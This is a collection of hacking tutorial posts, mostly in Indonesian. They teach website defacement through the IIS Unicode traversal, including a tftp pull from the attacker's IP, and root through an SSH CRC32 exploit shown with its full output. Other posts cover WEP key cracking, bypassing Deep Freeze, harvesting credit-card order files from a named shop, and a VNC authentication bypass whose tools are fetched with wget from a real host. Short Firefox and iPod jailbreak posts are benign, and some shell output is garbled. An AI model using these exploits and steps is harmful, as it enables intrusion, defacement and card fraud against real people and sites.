Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti “dir d:\” atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda “+”. Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari targetnyah…ehehhehehe).

Lanjuttt……udeh dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??…Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah…..Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot….Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa….isinyah banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh… .hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah….. truss kita cari dokumen web itu disitu utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….
http://www.targethost.com == neh yg ini……di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah…nah coba masukin salah satu dokumen web itu di site asli nyah… contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :

* Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
* Bagian command yaitu, cmdku.exe?/c+echo+
* Bagian HTML

* Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :

* http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:\InetPub\wwwroot\main.html

Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :

* Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
* Bagian folder, yaitu /winnt/system32/
* Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
* Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

——————————————–END————————————————–

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground…hehehehe “yang kreatif donk..!!”

Okeh sekrang kita ke UNIX yah…di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian “Hacking Shell”). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit “SSH CRC32 Exploit”, exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small – SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h – buf distance (estimate)
(1 ) testing 0×00000004 # SEGV #
(2 ) testing 0×0000c804 # FOUND #
Found buffer, determining exact diff
Finding h – buf distance using the teso method
(3 ) binary-search: h: 0×083fb7fc, slider: 0×00008000 # SEGV #
(4 ) binary-search: h: 0×083f77fc, slider: 0×00004000 # SURVIVED #
(5 ) binary-search: h: 0×083f97fc, slider: 0×00002000 # SURVIVED #
(6 ) binary-search: h: 0×083fa7fc, slider: 0×00001000 # SEGV #
(7 ) binary-search: h: 0×083f9ffc, slider: 0×00000800 # SEGV #
(8 ) binary-search: h: 0×083f9bfc, slider: 0×00000400 # SEGV #
(9 ) binary-search: h: 0×083f99fc, slider: 0×00000200 # SURVIVED #
(10) binary-search: h: 0×083f9afc, slider: 0×00000100 # SEGV #
(11) binary-search: h: 0×083f9a7c, slider: 0×00000080 # SEGV #
(12) binary-search: h: 0×083f9a3c, slider: 0×00000040 # SEGV #
(13) binary-search: h: 0×083f9a1c, slider: 0×00000020 # SEGV #
(14) binary-search: h: 0×083f9a0c, slider: 0×00000010 # SURVIVED #
(15) binary-search: h: 0×083f9a14, slider: 0×00000008 # SURVIVED #
Bin search done, testing result
Finding exact h – buf distance
(16) trying: 0×083f9a14 # SURVIVED #
Exact match found at: 0×000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0×080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h – stack_buf distance
(34) trying: 0xb7f7de98 slider: 0×0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0×0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0×0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0×0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0×0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0×0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0×0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0×0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0×0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0×080a
Crash, finding next return address
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
Crash, finding next return address
Changing MSW of return address to: 0×080a
Crash, finding next return address
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0×0808
Crash, finding next return address
Changing MSW of return address to: 0×0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

…..HOREEEEE…dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu…untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh…gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru…;)), gini caranya :

1. ganti dulu nama indexnyamv index.htm oldindex.htm
2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
3. masukan HTML yang kalian buat di vi ataupun pico tadi
4. buka browser kalian….heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!

Gitu aja kok caranya…mudah aja kan..?? hehehhe…intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula…so many exploit out thare…just get iT..!! hehehheudah dulu yah…BUBAYYYYYY!!!!!!!!!!!!
Continue reading...

WEP Crack + Cracking Tutorialc

Wah kayaknya seru neh kalo bisa online dimana-mana pake notebooks plus wifi, inget kata orang2 bijak, tutorial ini hannya untuk keperluan riset semata, penggunaan yang menyebabkan kerugian dalam bentuk apa pun adalah tanggung jawab masing-masing yah.. hehehe… Wired Equivalent Privacy atau (WEP) adalah salah satu cara mengamankan Acces point anda dari penggunaan yang tidak di inginkan detailnya tentang WEP silahkan langsung ke paman wiki,..

oke kita mulai,.. kondisinya,.. gue pake OS linux Ubuntu hardy truz pake pake USB Wifi merk zidas sama aja sama Tp-Link soalnya drivernnya sama :) truzz Access Point sasaran menggunakan Lyksys WRT54G yang di implementasinkan sebagai Hot Spot di suatu tempat yang dirahasiakan keberadaannya hehehe,..

Awalanya disuatu tempat ada hotspot yang dari bentuknya bisa dipastikan Linksys WRT54G or Linksys WAP54G, nah pas gue mo kenek keluar gambar sepeti diatas,.. itu menandakan bahwa Acces Pointnnya dilindung WEP password 64/128 bit HEX,.. nah tannya2 baca2 sedikit diajarin sama pak anton juga akhirnnya bisa juga membobol passowrdnya,..

Langkah 1, Install Aircrack-ng

#sudo apt-get install aircrack-ng

Langkah 2, Indentifikasi Device Kita

cari tau dulu MAC address device usb kita dan lokasi device tersebut,..

#sudo iwconfig

kemudian

#sudo ifconfig

oke dengan kedua perintah diatas kita sudah dapat mengetahui kalo lokasi device wireless kita berada di eth2 dengan mac 00:02:72:5A:3B:6C kita lanjut ke langkah selanjutnya,..

Langkah 3, Scanning

Scanning semua Access Point sasaran untuk mengetahui 3 hal, ssid “mukegile“, mac 00:18:F8:36:83:23 channel 6 tempat acces point beroprasi,…

#sudo airmon-ng stop eth2
#sudo iwlist eth2 scanning

Langkah 4, Monitor Mode

lanjutkan dengan merubah wifi kita menjadi monitor mode,..

#sudo airmon-ng start eth2 6

Langkah 5, Capturing Package

Kerjaan selanjutnya menangkap paket yang keluar dari acces point disimpan sebagai file,..

#sudo airodump-ng -c 6 –bssid 00:18:F8:36:83:23 -w output eth2

nah kerjaan ini yang agak lama,… tergantung sekali dengan paket yang di broadcast,.. kalo banyak yang pake Access Point itu makin cepet kita bisa crack passwordnya,.. kira2 data yang harus kita kumpulkan untuk cukup meng-carck 128 bit encryptions yah sekita 80.000 IVs, kalo mau tau berapa IVs yang sudah kita punya,.. teken CTRL-C aja truz lanjutkan ke langkah selanjutnya,..

Langkah 6, Crack

#sudo aircrack-ng -z -b 00:18:F8:36:83:23 output*.cap

dari gambar diatas kita bisa liat bahwa IVs yang kita dapat sekitar 81313 IVs,.. dan kita sudah dapat menemukan key atau passwordnya,.. perlu di ingat jika IVs-nya masih belum mencukupi pada saat anda melakukan perintah #aircrack-ng maka anda harus mengulang langkah ke 5 begitu saja berulang-ulang sampai IVs-nya terpenuhi diatas 80.000 IVs,..

jika anda sudah mendapatkan passwordnya tinggal menggunakannya untuk connect atau associates ,.. nah kebetulan pada saat saya coba key-nya,.. ternyata terkoneksi dengan muluz,… dan langsung dapet IP,.. ternyata Acces Point Hot Spot tersebut memberikan IP otomatis atau DHCP,.. akhirnya bisa konek dech,..

keliatan tuh.. cepet lagi konek ke yahoo 200-san… keyen,,… lain lagi ceritannya nanti kalo ternyata IP-nya nggak Otomatis alias DHCP,.. ada lagi caranya supaya kita bisa tetep terkoneksi,.. tapi nanti dech di tutorial selanjutnya,.. selamet mencoba,… “satu guru satu ilmu jangan ganggu yah” peace,…
Continue reading...

Jailbreaking + Hacking iPod Touch

Syarat:
* Tools ini cuman utk MacIntel
* Perlu koneksi WiFi + Internet (alias Hotspot)

Cara ngoprek iPod Touch:
0. Setting WiFi di iPod untuk terkoneksi dengan WiFi yang ada, dan test untuk berinternet dulu.
1. Download iJailbreak dari http://ijailbreak.googlecode.com/files/iJailBreak0.3fixed.zip
2. Extract hasil download
3. Copy isi direktori (isinya lho ya iJailbreak.app dan resources) ke folder /Applications
4. Rename Harddisk utama kamu menjadi “Macintosh HD”
5. Colokan iPod ke Mac … dan matikan iTunes
6. Jalankan iJailbreak dari /Applications …. dan ikuti petunjuk dari aplikasi tersebut.
7. Saat ada tulisan Jailbreaking …. tunggu sekitar 5-10 menit … kl muncul pesan2 error sebelum ada pesan sukses, mending cek ulang proses di atas sekali lagi, dan ulangi aja lagi.
8. Saat proses sukses …. perlu diingat password root nya adalah “alpine” bukan “dottie” seperti di iPhone ;))
9. Nah seharusnya skrg … iPod kamu udah ada aplikasi2 dari iPhone … seperti Mail, Stock, Weather. Tp Calendar belum bisa mode “Edit”.
10. Dari Terminal:
scp root@IP_ipod:/System/Library/CoreServices/SpringBoard.app/N45AP.plist .
plutil -convert xml1 N45AP.plist
vi N45AP.plist

Tambahkan baris berikut:

< key >editableUserData< / key >
< true / >

dibawah baris

< key >capabilities< / key >
< dict >
< /dict >

* Hapus spasi di antara karakter yang ada

Lalu konvert kembali ke binary:

plutil -convert binary1 N45AP.plist
scp N45AP.plist root@IP_ipod:/System/Library/CoreServices/SpringBoard.app/

Lalu kill proses springboard di iPod, dengan ssh ke sana … trus “ps auxwww” … cari PID springboard … kill [PID].

Lalu test aja deh ;))
Continue reading...

Berbagai Cara Melumpuhkan Deepfreeze

Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.
Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.

============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.

============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot

============Pake PE Builder (Live CD Windows)=============
Cara yang satu ini saya kutip dari Wikianswer. Aplikasi yag harus disiapkan adalah PE Builder. Anda bisa mendapatkannya di sini. Selain itu, anda membutuhkan file instalasi Windows (XP Home/ Pro dengan minimal SP 1 atau Server 2003).
Langkah-langkah yang harus dilakukan cukup panjang. Pertama-tama, kita harus membuat CD Startup Windows.
1. Pastikan sistem memiliki ruang kosong 500 MB.
2. Copy file instalasi Windows ke folder khusus di Harddisk.
3. Install PE Builder, lalu jalankan aplikasi ini.
4. Setelah menyetujui License Agreement, akan muncul tampilan utama PE Builder.
5. Masukkan lokasi file instalasi Windows.
6.Pada dialog PE Builder, pilih opsi “Burn CD/DVD”. Ketika anda menggunakan CD RW (bisa dihapus), pastikan bahwa pilihan “AutoErase RW” diaktifkan. Pilihan “burn using” harus diset ke “StarBurn”. Kalau anda ingin CD otomatis dikeluarkan setelah proses burning selesai, centangi “Eject after burn”. Pilih cd writer anda dari daftar device.
7. klik “build”. PE builder akan meminta ijin membuat direktori BartPE, jawab Yes.
8. Lisensi dari Microsoft Windows tampil. Baca dan pilih agree untuk melanjutkan.
9. Tunggu sampai selesai.
Langkah selajutnya, silakan retart komputer dan masuk ke BIOS. Ubah urutan booting agar boot melalui CD. Setelah masuk ke live CD Windows, lakukan langkah-berikut.
1. Jalankan regedit.
2. Buka menu Find dan masukkan “UpperFilters”. Jangan lupa centangi “only the Values”.
3. Jika telah ditemukan, lihat apakah terdapat baris yang mencantumkan driver Deep Freeze (DeepFrz atau DepFrzLo) lalu hapus. hapis juga baris untuk ThawSpace (ThwSpace), biarkan sisanya. Tekan F3 untuk melanjutkan pencarian dan ulangi proses diatas sampai value UpperFilters tidak ada di key HKLM\MySystem.
4. Tuju ke HKLM\MySystem\Select lalu buka value bernama Default. Di sini terdapat key untuk control set yang akan digunakan system saat booting. Jika nilainya 1 maka akan tertulis ControlSet001, jika 2 akan tertulis ControlSet002, dst. Ingat control set itu
5. Lalu tuju ke HKLM\MySystem\ControlSetXXX(sesuai default)\Services lalu hapis key yang bernama driver Deep Freeze (DeepFrz atau DepFrzLo dan DepFrzHi). Lalu hapus juga driver ThawSpace (ThwSpace).
6. Reboot system secara normal.
7. Selesai sudah.
Bila ada langkah-langkah yang kurang jelas, silakan periksa referensi.
Continue reading...

Hack Firefox: Secret of About:Config [1]

Ever since its debut, Firefox has garnered a reputation for being an enormously customizable program, both through its add-on architecture and its internal settings. In fact, many of Firefox’s settings aren’t exposed through the Tools > Options menu; the only way to change them is to edit them manually. In this article, we’ll explore some of the most useful Firefox settings that you can change on your own and that aren’t normally available through the program’s graphical interface.

The closest analogy to how Firefox manages its internal settings is the Windows Registry. Each setting, or preference, is given a name and stored as a string (text), integer (number) or Boolean (true/false) value. However, Firefox doesn’t keep its settings in the registry, but in a file called prefs.js. You can edit prefs.js directly, but it’s often easier to change the settings through the browser window.

Type about:config in the address bar and press Enter, and you’ll see all the settings currently enumerated in prefs.js, listed in alphabetical order. To narrow down the hundreds of configuration preferences to just the few you need, type a search term into the Filter: bar. (Click the Show All button or just clear the Filter: bar to get the full list back again.)

To edit a preference, double-click on the name and you’ll be prompted for the new value. If you double-click on an entry that has a Boolean value, it’ll just switch from true to false or vice versa; double-click again to revert to the original setting. Not all changes take effect immediately, so if you want to be absolutely certain a given change is in effect, be sure to close and reopen Firefox after making a change.

Note that not every setting in about:config exists by default. Some of them have to be created manually. If you want to add a new preference, right-click somewhere on the page and select New, then select the type of item to create (String, Integer or Boolean) and supply the name and value.

Before you begin

Here are a few caveats to keep in mind as you explore and tweak:

Not everyone will get the same benefits by enabling these tweaks. This is especially true for changing the network settings. If you habitually visit sites that don’t allow a large number of connections per client, for instance, you won’t see much benefit from raising the number of connections per server.

Some hacks may have a limited shelf life. With each successive release of Firefox, the need for tweaking any of the performance-related config settings (like the network settings) may dwindle as Firefox becomes more self-tuning based on feedback from real-world usage scenarios. In short, what works now may not always work in the future — and that might not be a bad thing.

Keep a log of everything you change, or make backups. If you tweak something now and notice bizarre activity in a week, you’ll want to be able to track back to what was altered and undo it. Firefox does show which about:config changes have been set manually, but this isn’t always the most accurate way to find out what you changed.

To make a backup of your preferences in Firefox, just make a copy of the file prefs.js, which is kept in your Firefox profile folder. If you mess something up, you can always copy this file back in. (Be sure to shut down Firefox before making a copy of prefs.js or moving a copy back into the profile folder!)

In Windows XP, the profile folder is
\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\.default\

In Windows Vista, this folder is
\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\.default\

Note that Application Data and AppData are hidden folders by default, so they may not show up unless you force Explorer to show hidden objects. (Open the Control Panel, double-click Folder Options, select the View tab, select “Show hidden files and folders” and click OK.)

In Mac OS X, the profile folder is
/Library/Application Support/Firefox/Profiles/.default/

and in Linux it’s
~/.mozilla/firefox/.default/

but on those platforms it’s usually quicker simply to search for prefs.js.

Alternatively, you can use the handy Firefox Extension Backup Extension (FEBE). It backs up not only the prefs.js file but just about every other thing in Firefox — extensions, themes, cookies, form history and so on
Continue reading...

Carding U-File Credit Card Database Hacking

U-file Credit Card Database Hacking

This is a basic tutorial for hacking u-file database order forms
it will teach you how to get u-file cc database so lets start

open this link

http://www.miamionlineflowers.com/orderformterra_anniversary_eng.htm

as you can see its an order form page.
1st step : (all you need to do is to view the source) go to view tab
then click the page source or view source.after you have viewed the source the

2nd step : (prest ctrl f then find u-file=) after you have found the “u-file=”
you will see this code all you need to get from the u-file is the “_private/form_results.txt”

3rd step :after getting the u-file this will be the last step just put the
u-file code besides the website like this.

http://www.miamionlineflowers.com/_private/form_results.txt

how to search in google : flowers orderform .htm | u-file=
so it will base on the string you use in searching for u-file database

here you go enjoy.
Continue reading...

VNC Viewer Authentication Bypass Hacking

VNC Viewer Authentication Bypass Hacking Database Servers

This Basic tutorial will teach you how to hack real VNC server databases.
some servers have mysql database and important information like Credit Card INFORMATION.
so it will depend on what ip range or what server are you scanning and what kind of server is running.
you can hack linux servers, sunos servers, mac os servers,xp servers etc. as long as they are vulnerable to
VNC AUthentication Bypass and using REAL VNC so this software will only bypass the real vnc software its like
Remote desktop in there servers.

The things you need here is:

1. RealVNC <= 4.1.1 Bypass Authentication Scanner 2. VNC Viewer Authentication Bypass 3. Linux uid shell or rootshell =========Linkz========== any of these tools will not held me resposible for any damages or action to the servers that you have hack its your own free will.if you want to download it or not its your choice. or you can try to find or search tools like this in the net.i just got this tools from some servers too. im just sharing informations :) (RealVNC <= 4.1.1 Bypass Authentication Scanner) for linux shell only http://upsstoreflorida.com/images/VNCscan (VNC Viewer Authentication Bypass link) windows base software http://upsstoreflorida.com/images/vncviewer-authbypass.zip (Linux uid shell or rootshell) Go Find your own shell to use so after you have gathered the tools you needed LETS START!first login to you shell then try to scan for vulnerable vnc servers by using the (RealVNC <= 4.1.1 Bypass Authentication Scanner). after scanning the output of your scan will go to VNC_bypauth.txt. all you need to do is cat VNC_bypauth.txt. then it will show the vnc servers you have scan if vulnerable or patch or banned so just get the VULNERABLE IPS then use the ip put it in the (VNC Viewer Authentication Bypass link) server box and just click OK.it will try to bypass auth the real vnc server if successfull you will be able to get in there desktop or server. this will be the process command output on the shell. ===SHELL EXAMPLE== -sh-3.2$ wget http://upsstoreflorida.com/images/VNCscan –09:47:54– http://upsstoreflorida.com/images/VNCscan => `VNCscan’
正å¨Ã¦¥Ã¦¾Ã¤¸»Ã¦© upsstoreflorida.com… 216.251.43.17
正å¨Ã©£Ã¦¥ upsstoreflorida.com|216.251.43.17|:80… é£Ã¤¸Ã¤ÂºÃ£
Ã¥·²Ã©Ã¥Âº HTTP è¦Ã¦±Ã¯¼Ã¦­£Ã¥¨Ã§­Ã¥Ã¥Ã¦… 200 OK
é·Ã¥Âº¦: 42,895 (42K) [text/html]

100%[====================================>] 42,895 34.24K/s

09:47:58 (34.16 KB/s) — Ã¥·²Ã¥
²Ã¥­ âVNCscanâ [42895/42895])
-sh-3.2$ ls -al
總è¨ 124
drwxr-xr-x 2 sally users 4096 2009-07-08 09:47 .
drwxr-xr-x 6 sally users 4096 2009-06-13 22:41 ..
-rwxr-xr-x 1 sally users 42895 2009-04-25 19:37 v
-rw-r–r– 1 sally users 27730 2009-07-08 10:24 VNC_bypauth.txt
-rwxr-xr-x 1 sally users 42895 2009-05-07 16:05 VNCscan
-sh-3.2$ ./VNCscan 符æ¬Ã©Ã§ ä½
-sh-3.2$ chmod +x VNCscan æ
-sh-3.2$ ./VNCscan

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner======= ============multi-threaded for Linux and Windows============= ====================================================[linux]== MAIN MENU ============================================================= [+] Usage: VNC_bypauth
Continue reading...

Old Deface Situs PHP Nuke

Langsung aj boss…

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
